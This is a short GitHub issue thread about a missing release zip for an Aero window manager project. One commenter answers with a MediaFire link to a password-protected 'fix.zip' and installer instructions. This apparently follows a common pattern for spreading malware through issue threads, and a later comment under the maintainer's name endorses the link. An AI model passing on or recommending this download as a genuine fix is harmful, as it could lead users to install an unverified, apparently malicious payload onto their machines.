### ISSUE TITLE
I can't find the 2004-22H2.zip file

### ISSUE THREAD

**Issue by LaerikMelo** [Dulappy/aero-window-manager#17]
i may be stupid, but i've been searching for it for quite some time and i'm not able to find anything, i've tried to install it with the regular "aero-window-manager-main.zip" but haven't found any sucess

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Dulappy** [comment]
Yes, thank you. It's right here. Thank you friend.
![image](https://github.com/user-attachments/assets/fee44430-9002-4d46-8c8d-754e9d4de506)
